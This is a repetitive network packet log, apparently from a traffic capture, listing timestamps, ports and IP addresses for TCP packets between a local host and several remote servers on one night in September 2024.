Sep 27, 2024 00:29:11.888927937 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.888937950 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.888947964 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.888957977 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.888966084 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.888984919 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.889137983 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.889170885 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.889205933 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.889216900 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.889240026 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.889250040 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.889260054 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.889271975 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.889293909 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.889300108 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.889302969 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.889322042 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.889978886 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.890012980 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.890053034 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.890095949 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.890106916 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.890116930 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.890137911 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.890152931 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.890204906 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.890214920 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.890224934 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.890235901 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.890249014 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.890254974 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.890264988 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.890305996 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.890316010 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.890326023 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.890336990 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.890353918 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.890786886 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.890815020 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.891241074 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.891278028 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.891298056 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.891309023 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.891340017 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.891371965 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.891381979 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.891400099 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.891410112 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.891412020 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.891428947 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.891513109 CEST	443	57912	172.67.162.108	192.168.2.6
Sep 27, 2024 00:29:11.891611099 CEST	443	57912	172.67.162.108	192.168.2.6
Sep 27, 2024 00:29:11.891693115 CEST	57912	443	192.168.2.6	172.67.162.108
Sep 27, 2024 00:29:11.891882896 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.891895056 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.891906023 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.891918898 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.891936064 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.891947031 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.891957045 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.891967058 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.891978025 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.891998053 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.892024994 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.892038107 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.892049074 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.892128944 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.892139912 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.892149925 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.892162085 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.892185926 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.892311096 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.892323017 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.892332077 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.892342091 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.892345905 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.892357111 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.892366886 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.892370939 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.892404079 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.892425060 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.892435074 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.892445087 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.892457962 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.892483950 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.895147085 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.895181894 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.895193100 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.895224094 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.895255089 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.895265102 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.895275116 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.895284891 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.895292044 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.895293951 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.895320892 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.895327091 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.895337105 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.895347118 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.895358086 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.895368099 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.895378113 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.895379066 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.895411968 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.895517111 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.895534039 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.895544052 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.895554066 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.895564079 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.895570993 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.895574093 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.895587921 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.895612955 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.895735025 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.895801067 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.895811081 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.895832062 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.895849943 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.895859957 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.895869017 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.895879984 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.895881891 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.895889997 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.895899057 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.895909071 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.895930052 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.895934105 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.895940065 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.895950079 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.895967007 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.895982027 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.895984888 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.895994902 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.896025896 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.898209095 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.939909935 CEST	57912	443	192.168.2.6	172.67.162.108
Sep 27, 2024 00:29:11.939961910 CEST	443	57912	172.67.162.108	192.168.2.6
Sep 27, 2024 00:29:11.939997911 CEST	57912	443	192.168.2.6	172.67.162.108
Sep 27, 2024 00:29:11.940015078 CEST	443	57912	172.67.162.108	192.168.2.6
Sep 27, 2024 00:29:11.970558882 CEST	57914	443	192.168.2.6	188.114.97.3
Sep 27, 2024 00:29:11.970618010 CEST	443	57914	188.114.97.3	192.168.2.6
Sep 27, 2024 00:29:11.970680952 CEST	57914	443	192.168.2.6	188.114.97.3
Sep 27, 2024 00:29:11.971867085 CEST	57914	443	192.168.2.6	188.114.97.3
Sep 27, 2024 00:29:11.971888065 CEST	443	57914	188.114.97.3	192.168.2.6
Sep 27, 2024 00:29:11.986067057 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.986079931 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.986090899 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.986128092 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.986139059 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.986150026 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.986150980 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.986166954 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.986195087 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.986267090 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.986278057 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.986289024 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.986299038 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.986309052 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.986310959 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.986320019 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.986330032 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.986339092 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.986382008 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.986439943 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.986449957 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.986468077 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.986478090 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.986481905 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.986489058 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.986499071 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.986510038 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.986512899 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.986521006 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.986529112 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.986573935 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.986587048 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.986597061 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.986608028 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.986618996 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.986633062 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.986649036 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.986680984 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.986690998 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.986702919 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.986713886 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.986737013 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.986766100 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.986788988 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.986799002 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.986809015 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.986820936 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.986828089 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.986862898 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.986890078 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.986900091 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.986911058 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.986922026 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.986931086 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.986967087 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.986994982 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.987004995 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.987015963 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.987025976 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.987035990 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.987035990 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.987063885 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.987127066 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.987138033 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.987149000 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.987164021 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.987166882 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.987175941 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.987186909 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.987190008 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.987205029 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.987242937 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.987252951 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.987265110 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.987286091 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.987310886 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.987325907 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.987335920 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.987346888 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.987360001 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.987373114 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.987406969 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.987437963 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.987453938 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.987466097 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.987477064 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.987487078 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.987488985 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.987497091 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.987508059 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.987508059 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.987526894 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.987536907 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.987540960 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.987564087 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.987628937 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.987638950 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.987649918 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.987660885 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.987669945 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.987685919 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.987700939 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.987718105 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.987721920 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.987732887 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.987763882 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.987793922 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.987804890 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.987814903 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.987834930 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.987881899 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.987893105 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.987910986 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.987914085 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.987921953 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.987934113 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.987945080 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.987955093 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.988018990 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.988039970 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.988050938 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.988128901 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.988140106 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.988149881 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.988179922 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.988189936 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.988200903 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.988212109 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.988223076 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.988229036 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.988245964 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.988298893 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.988308907 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.988320112 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.988329887 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.988332987 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.988341093 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.988363028 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.988384962 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.988396883 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.988405943 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.988409042 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.988431931 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.988445044 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.988475084 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.988497972 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.988507986 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.988539934 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.988550901 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.988560915 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.988571882 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.988605976 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.988624096 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.988634109 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.988652945 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.988722086 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.988733053 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.988744020 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.988754034 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.988753080 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.988765001 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.988776922 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.988778114 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.988792896 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.032494068 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.079308033 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.079334974 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.079346895 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.079413891 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.079426050 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.079422951 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.079437017 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.079447985 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.079452038 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.079492092 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.079529047 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.079539061 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.079550982 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.079561949 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.079572916 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.079575062 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.079583883 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.079607010 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.079751968 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.079762936 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.079773903 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.079783916 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.079787016 CEST	57911	80	192.168.2.6	147.45.44.104
